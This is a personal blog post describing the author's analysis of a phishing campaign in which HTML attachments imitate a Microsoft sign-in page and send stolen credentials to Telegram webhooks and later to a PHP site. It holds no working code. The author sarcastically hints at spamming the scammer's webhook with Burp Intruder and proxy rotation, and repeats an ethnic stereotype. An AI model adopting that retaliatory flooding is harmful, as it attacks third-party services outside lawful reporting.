Embedded Files
Unlike many aspiring cybersec people, I am blessed to have the gift of a friend who hosts their own email server. Why is this important for researchers?
A while back I was generating JS payloads and sending it to myself over Gmail (I know, terrible opsec!), and before you ask - yes it could be classified as a "malware stager" but it was for a CTF and did nothing malicious. Unfortunately for me I found that I could not send myself the semi-malicious code which I had just cooked up because Google gave me a lovely notification stating that my message was rejected due to security issues. I even zipped the file and STILL google dug through it! I learned two things that day.
Google scans ALL your email attachments - including compressed archives. Wow big surprise (not).
Google malware attachment scan is extreme. I had just coded the JS payload and somehow Google knew it was malware.
The key takeaway is that Google's email filtering system is powerful. Every day hundreds of malicious and spam emails are sent from one server to another and yet we tend to not see any malicious MS word documents unless we are the target of a specific operation. This is also true for other email services like Outlook and Yahoo. So what happens when you don't have Google spyware scanning and malware detection filters on your inbox - as in you self host it?
You get malware sent to you. A lot of it.
The Gigachad, who I won't name, will on occasion forward me these malware containing emails for me to process. From hereon forward I will simply refer to my friend here as "Gigachad". This is the story of one of those campaigns.
The First Email.
The First Email.
On September 13th 2023 I was greeted by my inbox telling me that Gigachad had sent me a new email! A campaign was waiting to be investigated! Attached was a single HTML file with the name "VM 1598948 faxing3773.html" with the size of 5.3MB. So, I spun up my virtualmachine, turned on my VPN, and made a fileserver for my hostonly adapter. Upon opening the file I was greeted by 8 lines of HTML and one wall of JavaScript.
Hmmm. URL encode. This is the part when I nearly lost it. You see, Qterminal doesn't have a select all shortcut. I could open the html file in tee or cat or nano, but ANY time I opened in a gui texteditor the software froze! LOOK AT THIS SHIT QT! I DON'T SEE THE OPTION FOR SELECT ALL!
Schizo rant aside, I eventually overcame this setback with the usage of VSCodium - a better version of Microsoft's Visual Studio Code without the added spyware. I copied everything and pasted it into my favorite URLDecoder: Burp Suite. I pasted the code in and waited 5 minutes for the poor software to handle everything compared the results.
Huh. Another urlencode? I mean that is one way of obfuscating code I guess. I put the result into burpsuite again which resulted in the following output.
NOW we are getting somewhere. If you have worked at all with JS malware you should recognize that this obfuscated code looks like it came straight out of obfuscator.io . Nothing a bit of debugging cannot reverse engineer. Unfortunately for me I don't like waiting, and I don't want to decode all that B64, so I jumped straight into dynamic analysis. We initially open up the html file to be greeted by a Microsoft sharepoint logo and a loading circle. After this we are then greeted with the Microsoft Signin which we all know and love. Very impressive, Especially considering so few external network requests have been made.
The html file even checks to see if the email is "Valid", that is that there is an at symbol sandwhiched between two letters. Putting in a password that is less than 5 characters results in a pretty convincing "server error". Anyways I put in the bogus information and hit send. Low and behold a request is intercepted!
Ah, it is the classic webhook exfiltrator. This time it seems that scammers have switched from using Discord webhooks to using Telegram webhooks. Unfortunately for our scammer however, it seems that they shipped us a release candidate of their HTML file, the postal code, county, IP, org and everything else seems to be empty! As well as this they left their ICQ handle! EPIC fail! Well, we now have a name for the scammer, lets call them Lio
Gigachad looked into this and apparently found a Linkedin page from the ICQ handle. Surprisingly, Lio is Nigerian which just adds to the stereotype of Nigerian scammers. Regardless whether or not this is a false flag, you should know what to do once you find a webhook for exfiltrating stolen data ;). I did not proceed to open up 5 repeater tabs and set my proxies to rotate and I also did not send Lio a couple hundred copies of the bee movie script. And with that, another phishing campaign was thwarted. Case closed. Or so I thought...
Part 2: Another Email.
Part 2: Another Email.
On September the 15th I received a new email from Gigachad. Nothing out of the ordinary, just a new html file disguised as a .bin file with the name "Invoice#1012_.html.bin". Oldest trick in the book - the old "notavirus.jpg.exe", I never knew that scammers still try to use this trick. I opened the file.
Hey wait a minute, I think I have seen this before! I decoded the URL-Encoded garbage and out came version two of our Microsoft Sharepoint html file. On the left is the original, the right is V2. It seems that they execute a script to immediately write the HTML instead of having the <!DOCTYPE html> on the first line as well as removed that stupid S they forgot to delete next to the head tags. One theory I have as to the reason of the change is to evade filetype detection. If you rename "image.jpg" to "image" the OS usually still knows it is a jpg, maybe that is what the scammer was trying to do? A part from the modifications at the start of the file, everything remained the same.
So I did not restart the intruder, and I did not set my proxy rotator to run overnight and did I also did not send more copies of the bee movie script, but I did conclude that Lio would never bother me again.
I was wrong.
Part 3: Version 3.0.
Part 3: Version 3.0.
On September 18th 2023 Gigachad sent me another email. I looked at the name and I already knew what to expect.
HUH? What is this??? Completely new code and only 17Kb in size! I immediately open it. The proxy immediately flashes notifying me of an outbound GET request to fleek.ipfs.io. Further inspection shows that ipinfo.io. Inspecting the request we see that there is a sizeable JS payload. This code is looking more like something a professional scammer built, not some skiddy! I guess Lio learned what ChatGPT was. After the rest of the JS code is put through, the html file then makes some requests to Microsoft CDN's to get their official image resources.
Now take a look at line 43. Looks like Lio wants to see who is definitely not spamming his telegram channel. I of course happily give his little HTML file the correct information as shown bellow.
And after typing in AAAAA as my password, a new telegram webhook is revealed!
Once again, I did not open 6 tabs of Burp intruder, I did not turn on my proxy rotator, I did not send ten thousand copies of the bee movie to Lio's channel and I also did not change my location to the dark side of the moon.
I had once again beaten Lio, but deep down I knew that eventually he would stop using telegram...
Part 4: Lio Learns Cloudflare.
Part 4: Lio Learns Cloudflare.
Over the next two weeks Lio had reverted to version 2.0. Who knows why this is, ipfs.io TOS violation perhaps, I wonder who reported that? Regardless the only changes in these trivial versions was the ICQ contact name. I continued to not run my intruder tabs.
And then it happened: V4.0 got released.
On September 25th 2023 I had received an email from Gigachad. The file attachment was named Invoice#1012_.html.bin - 442 bytes in size. Lio was back from vacation, and by the looks of it he went to Meowmix Central and picked up some skitty tips. Inside the file was 10 lines of code. Base64encoded.
Unfortunately my dumbass did not catalogue the images at this point, so I will have to describe in text what happened next. I opened the file. Immediately I was redirected to REDACTED.bpyquso.ru. The dreaded banner of cloudflare appeared in view, looks like I won't be using intruder this time. Now let me tell you a story about why I am not a big big fan of cloudflare.
A while back I had tracked a CNC server to a host behind cloudflare. After sending evidence and proof that the host violated the TOS and explicitly delivered malware, cloudflare manually rejected my request. Cloudflare has been known to host pirated content and extremist content behind it's CDN and DDOS prevention network. This is just one of many instances of abuse that Cloudflare facilitates on the internet.
Regardless, inspecting the website revealed that Lio was using php. Typing in a bogus email no longer worked as the website made a POST request to Lio's new api. I typed in a commonly used Microsoft account email: example@example.com, which then let me through. Typing in the password finished the job with the username and password being sent to Lio's api. Unfortunately there was nothing I could really do about Lio this time.
Until I Looked at the WHOIS. Lio's registrar info was exposed! Naturally the registrar was located in Russia. Now, despite what you may think about the Russian internet, they are still MUCH better than Cloudflare at handling abuse complaints, and it never hurts to use Yandex translate to send an abuse complaint. So, I sent a complaint, and now Lio's php website no longer functions. Could it have something to do with the lack of registrar? Who knows. As of writing this blog, the whois lookup now says that the registrar is cloudflare (unsurprisingly). Still, It has been well over two weeks since Gigachad had sent me an email from Lio, I think he has learned his lesson and has moved on to crypto-scamming.
The moral of this story my skittens is that "What kills you only makes you stronger" only works until it actually kills you. Thanks for reading.
Google Sites
Report abuse